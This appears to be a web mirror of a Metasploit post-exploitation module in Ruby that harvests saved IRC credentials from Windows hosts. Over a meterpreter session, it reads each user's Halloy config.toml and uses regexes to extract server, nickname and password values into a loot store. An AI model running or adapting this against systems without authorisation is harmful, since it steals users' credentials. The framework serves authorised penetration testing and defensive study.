Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/halloy_irc.rb
19664 views
1
# This module requires Metasploit: https://metasploit.com/download

2
# Current source: https://github.com/rapid7/metasploit-framework

3
##

4


5
class MetasploitModule < Msf::Post

6
  include Msf::Post::File

7
  include Msf::Post::Windows::UserProfiles

8
  include Msf::Post::Windows::Packrat

9
  ARTIFACTS =

10
    {

11
      application: 'Halloy IRC',

12
      app_category: 'IRC',

13
      gatherable_artifacts: [

14
        {

15
          filetypes: 'logins',

16
          path: 'AppData',

17
          dir: 'halloy',

18
          artifact_file_name: 'config.toml',

19
          description: 'Saved Bookmarks',

20
          credential_type: 'text',

21
          regex_search: [

22
            {

23
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

24
              extraction_type: 'credentials',

25
              regex: [

26
                '(?i-mx:server =.*)',

27
                '(?i-mx:port =.*)',

28
                '(?i-mx:nickname =.*)',

29
                '(?i-mx:password =.*)'

30
              ]

31
            }

32
          ]

33
        }

34
      ]

35
    }.freeze

36


37
  def initialize(info = {})

38
    super(

39
      update_info(

40
        info,

41
        'Name' => 'Halloy IRC Credential Gatherer',

42
        'Description' => %q{

43
          This module searches for credentials stored on Halloy IRC Client on a Windows host.

44
        },

45
        'License' => MSF_LICENSE,

46
        'Author' => [

47
          'Jacob Tierney',

48
          'Kazuyoshi Maruta',

49
          'Daniel Hallsworth',

50
          'Barwar Salim M',

51
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

52
        ],

53
        'Platform' => ['win'],

54
        'SessionTypes' => ['meterpreter'],

55
        'Notes' => {

56
          'Stability' => [CRASH_SAFE],

57
          'Reliability' => [],

58
          'SideEffects' => []

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

66
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

67
        # enumerates the options based on the artifacts that are defined below

68
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

69
      ]

70
    )

71
  end

72


73
  def run

74
    print_status('Filtering based on these selections:  ')

75
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

76
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

77
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

78


79
    # used to grab files for each user on the remote host

80
    grab_user_profiles.each do |userprofile|

81
      run_packrat(userprofile, ARTIFACTS)

82
    end

83


84
    print_status 'PackRat credential sweep completed'

85
  end

86
end

87


88